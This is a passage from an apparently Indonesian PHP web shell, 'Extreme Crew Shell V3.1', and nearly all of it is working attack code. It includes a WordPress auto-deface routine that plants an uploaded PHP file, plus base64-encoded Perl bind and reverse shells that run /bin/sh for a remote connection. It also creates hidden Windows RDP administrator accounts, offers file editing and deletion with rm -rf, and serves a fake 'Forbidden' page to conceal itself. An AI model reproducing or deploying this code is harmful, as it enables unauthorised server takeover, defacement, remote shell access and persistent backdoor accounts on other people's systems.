1765 $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
1766 $www = "m.php";
1767 $fp5 = fopen($www,"w");
1768 fputs($fp5,$upload3);
1769 $post2 = array(
1770 "_wpnonce" => "$anu2",
1771 "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
1772 "themezip" => "@$www",
1773 "install-theme-submit" => "Install Now",
1774 );
1775 $ch = curl_init("$target/wp-admin/update.php?cr0tz&action=upload-theme");
1776 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1777 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1778 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1779 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1780 curl_setopt($ch, CURLOPT_POST, 1);
1781 curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
1782 curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1783 curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1784 curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1785 $data3 = curl_exec($ch);
1786 curl_close($ch);
1787 $y = date("Y");
1788 $m = date("m");
1789 $namafile = "id.php";
1790 $fpi = fopen($namafile,"w");
1791 fputs($fpi,$script);
1792 $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
1793 curl_setopt($ch6, CURLOPT_POST, true);
1794 curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
1795 curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
1796 curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
1797 curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
1798 curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
1799 $postResult = curl_exec($ch6);
1800 curl_close($ch6);
1801 $as = "$target/k.php";
1802 $bs = anucurl($as);
1803 if(preg_match("#$script#is", $bs)) {
1804 echo "[+] <font color='lime'>berhasil mepes...</font><br>";
1805 echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
1806 } else {
1807 echo "[-] <font color='red'>gagal mepes...</font><br>";
1808 echo "[!!] coba aja manual: <br>";
1809 echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
1810 echo "[+] username: <font color=lime>$user</font><br>";
1811 echo "[+] password: <font color=lime>$pass</font><br><br>";
1812 }
1813 mysql_close($conn);
1814 }
1815 }
1816 } else {
1817 echo "<center><h1>WordPress Auto Deface V.2</h1>
1818 <form method='post'>
1819 Link Config: <br>
1820 <textarea name='link' placeholder='http://target.com/ec_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
1821 <input type='text' name='script' height='10' size='50' placeholder='Hacked by Extreme Crew' required><br>
1822 <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
1823 </form></center>";
1824 }
1825} elseif($_GET['do'] == 'network') {
1826 echo "<form method='post'>
1827 <u>Bind Port:</u> <br>
1828 PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
1829 <input type='submit' name='sub_bp' value='>>'>
1830 </form>
1831 <form method='post'>
1832 <u>Back Connect:</u> <br>
1833 Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>
1834 PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
1835 <input type='submit' name='sub_bc' value='>>'>
1836 </form>";
1837 $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
1838 if(isset($_POST['sub_bp'])) {
1839 $f_bp = fopen("/tmp/bp.pl", "w");
1840 fwrite($f_bp, base64_decode($bind_port_p));
1841 fclose($f_bp);
1842
1843 $port = $_POST['port_bind'];
1844 $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
1845 sleep(1);
1846 echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
1847 unlink("/tmp/bp.pl");
1848 }
1849 $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
1850 if(isset($_POST['sub_bc'])) {
1851 $f_bc = fopen("/tmp/bc.pl", "w");
1852 fwrite($f_bc, base64_decode($bind_connect_p));
1853 fclose($f_bc);
1854
1855 $ipbc = $_POST['ip_bc'];
1856 $port = $_POST['port_bc'];
1857 $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
1858 sleep(1);
1859 echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
1860 unlink("/tmp/bc.pl");
1861 }
1862} elseif($_GET['do'] == 'tentang'){
1863 echo "<center>";
1864 echo "<h2>Extreme Crew Shell V3.1</h2>";
1865 echo "<p>Terima kasih buat kawan-kawan seperjuangan yang telah memberikan keperawa.. eh kepercayaan deng hehe</p>";
1866 echo "<p>Terima kasih buat IndoXploit & K2LL33D yang telah dengan senang hati memperbolehkan menambah atau mengurangi isi coding nya hehe";
1867 echo "<p>Terima kasih untuk kawan homo,sering colay,sering nangis,sering baper,dan sering seiring waktu hahaha</p>";
1868 echo "<p>Tanpa kalian saya tidak bisa menjadi seperti ini , terima kasih banyaklah pokoknya</p>";
1869 echo "<p>Mr.BucketHead - Khan007 - Mr.ApaPedulimu - Versailles48 - Mr.DreamX196 - l0c4lh3artz - Mr.AchanX48 - ./Mr.J - Sohai - HaXor Tr0j4n - ./51N1CH1 - Ndivic404 - FrozenBear404 - KidSZonk - Jje Incovers - Courageux - /Zeelous - fcod3x - McQueen_404 - Sadream - Chinax1337 - Mr.Akashi - Mr.LittleHaxor - zp3nzas - dll</p>";
1870} elseif($_GET['do'] == 'krdp_shell') {
1871 if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
1872 if($_POST['create']) {
1873 $user = htmlspecialchars($_POST['user']);
1874 $pass = htmlspecialchars($_POST['pass']);
1875 if(preg_match("/$user/", exe("net user"))) {
1876 echo "[INFO] -> <font color=red>user <font color=lime>$user</font> sudah ada</font>";
1877 } else {
1878 $add_user = exe("net user $user $pass /add");
1879 $add_groups1 = exe("net localgroup Administrators $user /add");
1880 $add_groups2 = exe("net localgroup Administrator $user /add");
1881 $add_groups3 = exe("net localgroup Administrateur $user /add");
1882 echo "[ RDP ACCOUNT INFO ]<br>
1883 ------------------------------<br>
1884 IP: <font color=lime>".$ip."</font><br>
1885 Username: <font color=lime>$user</font><br>
1886 Password: <font color=lime>$pass</font><br>
1887 ------------------------------<br><br>
1888 [ STATUS ]<br>
1889 ------------------------------<br>
1890 ";
1891 if($add_user) {
1892 echo "[add user] -> <font color='lime'>Berhasil</font><br>";
1893 } else {
1894 echo "[add user] -> <font color='red'>Gagal</font><br>";
1895 }
1896 if($add_groups1) {
1897 echo "[add localgroup Administrators] -> <font color='lime'>Berhasil</font><br>";
1898 } elseif($add_groups2) {
1899 echo "[add localgroup Administrator] -> <font color='lime'>Berhasil</font><br>";
1900 } elseif($add_groups3) {
1901 echo "[add localgroup Administrateur] -> <font color='lime'>Berhasil</font><br>";
1902 } else {
1903 echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
1904 }
1905 echo "------------------------------<br>";
1906 }
1907 } elseif($_POST['s_opsi']) {
1908 $user = htmlspecialchars($_POST['r_user']);
1909 if($_POST['opsi'] == '1') {
1910 $cek = exe("net user $user");
1911 echo "Checking username <font color=lime>$user</font> ....... ";
1912 if(preg_match("/$user/", $cek)) {
1913 echo "[ <font color=lime>Sudah ada</font> ]<br>
1914 ------------------------------<br><br>
1915 <pre>$cek</pre>";
1916 } else {
1917 echo "[ <font color=red>belum ada</font> ]";
1918 }
1919 } elseif($_POST['opsi'] == '2') {
1920 $cek = exe("net user $user Extreme Crew");
1921 if(preg_match("/$user/", exe("net user"))) {
1922 echo "[change password: <font color=lime>Extreme Crew</font>] -> ";
1923 if($cek) {
1924 echo "<font color=lime>Berhasil</font>";
1925 } else {
1926 echo "<font color=red>Gagal</font>";
1927 }
1928 } else {
1929 echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
1930 }
1931 } elseif($_POST['opsi'] == '3') {
1932 $cek = exe("net user $user /DELETE");
1933 if(preg_match("/$user/", exe("net user"))) {
1934 echo "[remove user: <font color=lime>$user</font>] -> ";
1935 if($cek) {
1936 echo "<font color=lime>Berhasil</font>";
1937 } else {
1938 echo "<font color=red>Gagal</font>";
1939 }
1940 } else {
1941 echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
1942 }
1943 } else {
1944 //
1945 }
1946 } else {
1947 echo "-- Create RDP --<br>
1948 <form method='post'>
1949 <input type='text' name='user' placeholder='username' value='Extreme Crew' required>
1950 <input type='text' name='pass' placeholder='password' value='Extreme Crew' required>
1951 <input type='submit' name='create' value='>>'>
1952 </form>
1953 -- Option --<br>
1954 <form method='post'>
1955 <input type='text' name='r_user' placeholder='username' required>
1956 <select name='opsi'>
1957 <option value='1'>Cek Username</option>
1958 <option value='2'>Ubah Password</option>
1959 <option value='3'>Hapus Username</option>
1960 </select>
1961 <input type='submit' name='s_opsi' value='>>'>
1962 </form>
1963 ";
1964 }
1965 } else {
1966 echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
1967 }
1968} elseif($_GET['act'] == 'newfile') {
1969 if($_POST['new_save_file']) {
1970 $newfile = htmlspecialchars($_POST['newfile']);
1971 $fopen = fopen($newfile, "a+");
1972 if($fopen) {
1973 $act = "<script>window.location='?cr0tz&act=edit&folder=".$dir."&file=".$_POST['newfile']."';</script>";
1974 } else {
1975 $act = "<font color=red>permission denied</font>";
1976 }
1977 }
1978 echo $act;
1979 echo "<form method='post'>
1980 Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
1981 <input type='submit' name='new_save_file' value='Submit'>
1982 </form>";
1983} elseif($_GET['act'] == 'newfolder') {
1984 if($_POST['new_save_folder']) {
1985 $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
1986 if(!mkdir($new_folder)) {
1987 $act = "<font color=red>permission denied</font>";
1988 } else {
1989 $act = "<script>window.location='?cr0tz&folder=".$dir."';</script>";
1990 }
1991 }
1992 echo $act;
1993 echo "<form method='post'>
1994 Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
1995 <input type='submit' name='new_save_folder' value='Submit'>
1996 </form>";
1997} elseif($_GET['act'] == 'rename_dir') {
1998 if($_POST['dir_rename']) {
1999 $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
2000 if($dir_rename) {
2001 $act = "<script>window.location='?cr0tz&folder=".dirname($dir)."';</script>";
2002 } else {
2003 $act = "<font color=red>permission denied</font>";
2004 }
2005 echo "".$act."<br>";
2006 }
2007 echo "<form method='post'>
2008 <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
2009 <input type='submit' name='dir_rename' value='rename'>
2010 </form>";
2011} elseif($_GET['act'] == 'delete_dir') {
2012 if(is_dir($dir)) {
2013 if(is_writable($dir)) {
2014 @rmdir($dir);
2015 @exe("rm -rf $dir");
2016 @exe("rmdir /s /q $dir");
2017 $act = "<script>window.location='?cr0tz&folder=".dirname($dir)."';</script>";
2018 } else {
2019 $act = "<font color=red>could not remove ".basename($dir)."</font>";
2020 }
2021 }
2022 echo $act;
2023} elseif($_GET['act'] == 'view') {
2024 echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?cr0tz&act=view&folder=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?cr0tz&act=edit&folder=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?cr0tz&act=rename&folder=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?cr0tz&act=download&folder=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?cr0tz&act=delete&folder=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
2025 echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
2026} elseif($_GET['act'] == 'edit') {
2027 if($_POST['save']) {
2028 $save = file_put_contents($_GET['file'], $_POST['src']);
2029 if($save) {
2030 $act = "<font color=lime>Saved!</font>";
2031 } else {
2032 $act = "<font color=red>permission denied</font>";
2033 }
2034 echo "".$act."<br>";
2035 }
2036 echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?cr0tz&act=view&folder=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?cr0tz&act=edit&folder=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?cr0tz&act=rename&folder=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?cr0tz&act=download&folder=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?cr0tz&act=delete&folder=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
2037 echo "<form method='post'>
2038 <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
2039 <input type='submit' value='Save' name='save' style='width: 500px;'>
2040 </form>";
2041} elseif($_GET['act'] == 'rename') {
2042 if($_POST['do_rename']) {
2043 $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
2044 if($rename) {
2045 $act = "<script>window.location='?cr0tz&folder=".$dir."';</script>";
2046 } else {
2047 $act = "<font color=red>permission denied</font>";
2048 }
2049 echo "".$act."<br>";
2050 }
2051 echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?cr0tz&act=view&folder=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?cr0tz&act=edit&folder=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?cr0tz&act=rename&folder=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?cr0tz&act=download&folder=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?cr0tz&act=delete&folder=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
2052 echo "<form method='post'>
2053 <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
2054 <input type='submit' name='do_rename' value='rename'>
2055 </form>";
2056} elseif($_GET['act'] == 'delete') {
2057 $delete = unlink($_GET['file']);
2058 if($delete) {
2059 $act = "<script>window.location='?cr0tz&folder=".$dir."';</script>";
2060 } else {
2061 $act = "<font color=red>permission denied</font>";
2062 }
2063 echo $act;
2064} else {
2065 if(is_dir($dir) === true) {
2066 if(!is_readable($dir)) {
2067 echo "<font color=red>can't open directory. ( not readable )</font>";
2068 } else {
2069 echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
2070 <tr>
2071 <th class="th_home"><center>Name</center></th>
2072 <th class="th_home"><center>Type</center></th>
2073 <th class="th_home"><center>Size</center></th>
2074 <th class="th_home"><center>Last Modified</center></th>
2075 <th class="th_home"><center>Owner/Group</center></th>
2076 <th class="th_home"><center>Permission</center></th>
2077 <th class="th_home"><center>Action</center></th>
2078 </tr>';
2079 $scandir = scandir($dir);
2080 foreach($scandir as $dirx) {
2081 $dtype = filetype("$dir/$dirx");
2082 $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
2083 if(function_exists('posix_getpwuid')) {
2084 $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
2085 $downer = $downer['name'];
2086 } else {
2087 //$downer = $uid;
2088 $downer = fileowner("$dir/$dirx");
2089 }
2090 if(function_exists('posix_getgrgid')) {
2091 $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
2092 $dgrp = $dgrp['name'];
2093 } else {
2094 $dgrp = filegroup("$dir/$dirx");
2095 }
2096 if(!is_dir("$dir/$dirx")) continue;
2097 if($dirx === '..') {
2098 $href = "<a href='?cr0tz&folder=".dirname($dir)."'>$dirx</a>";
2099 } elseif($dirx === '.') {
2100 $href = "<a href='?cr0tz&folder=$dir'>$dirx</a>";
2101 } else {
2102 $href = "<a href='?cr0tz&folder=$dir/$dirx'>$dirx</a>";
2103 }
2104 if($dirx === '.' || $dirx === '..') {
2105 $act_dir = "<a href='?cr0tz&act=newfile&folder=$dir'>newfile</a> | <a href='?cr0tz&act=newfolder&folder=$dir'>newfolder</a>";
2106 } else {
2107 $act_dir = "<a href='?cr0tz&act=rename_dir&folder=$dir/$dirx'>rename</a> | <a href='?cr0tz&act=delete_dir&folder=$dir/$dirx'>delete</a>";
2108 }
2109 echo "<tr>";
2110 echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
2111 echo "<td class='td_home'><center>$dtype</center></td>";
2112 echo "<td class='td_home'><center>-</center></th></td>";
2113 echo "<td class='td_home'><center>$dtime</center></td>";
2114 echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
2115 echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
2116 echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
2117 echo "</tr>";
2118 }
2119 }
2120 } else {
2121 echo "<font color=red>can't open directory.</font>";
2122 }
2123 foreach($scandir as $file) {
2124 $ftype = filetype("$dir/$file");
2125 $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
2126 $size = filesize("$dir/$file")/1024;
2127 $size = round($size,3);
2128 if(function_exists('posix_getpwuid')) {
2129 $fowner = @posix_getpwuid(fileowner("$dir/$file"));
2130 $fowner = $fowner['name'];
2131 } else {
2132 //$downer = $uid;
2133 $fowner = fileowner("$dir/$file");
2134 }
2135 if(function_exists('posix_getgrgid')) {
2136 $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
2137 $fgrp = $fgrp['name'];
2138 } else {
2139 $fgrp = filegroup("$dir/$file");
2140 }
2141 if($size > 1024) {
2142 $size = round($size/1024,2). 'MB';
2143 } else {
2144 $size = $size. 'KB';
2145 }
2146 if(!is_file("$dir/$file")) continue;
2147 echo "<tr>";
2148 echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?cr0tz&act=view&folder=$dir&file=$dir/$file'>$file</a></td>";
2149 echo "<td class='td_home'><center>$ftype</center></td>";
2150 echo "<td class='td_home'><center>$size</center></td>";
2151 echo "<td class='td_home'><center>$ftime</center></td>";
2152 echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
2153 echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
2154 echo "<td class='td_home' style='padding-left: 15px;'><a href='?cr0tz&act=edit&folder=$dir&file=$dir/$file'>edit</a> | <a href='?cr0tz&act=rename&folder=$dir&file=$dir/$file'>rename</a> | <a href='?cr0tz&act=delete&folder=$dir&file=$dir/$file'>delete</a> | <a href='?cr0tz&act=download&folder=$dir&file=$dir/$file'>download</a></td>";
2155 echo "</tr>";
2156 }
2157 echo "</table>";
2158 if(!is_readable($dir)) {
2159 //
2160 } else {
2161 echo "<hr>";
2162 }
2163 echo "<center>Copyright © ".date("Y")." - <a href='?cr0tz&folder=$dir&do=tentang'>Extreme Crew</a></center>";
2164}
2165echo "</html>";
2166}
2167else
2168{
2169echo "<h1>Forbidden</h1><p>You dont't have permission to access ".$dir." on this server.</p><hr>
2170<address>Apache Server at ".gethostbyname($_SERVER['HTTP_HOST'])." Port 80</address></body></html>";
2171return false;
2172}
2173?>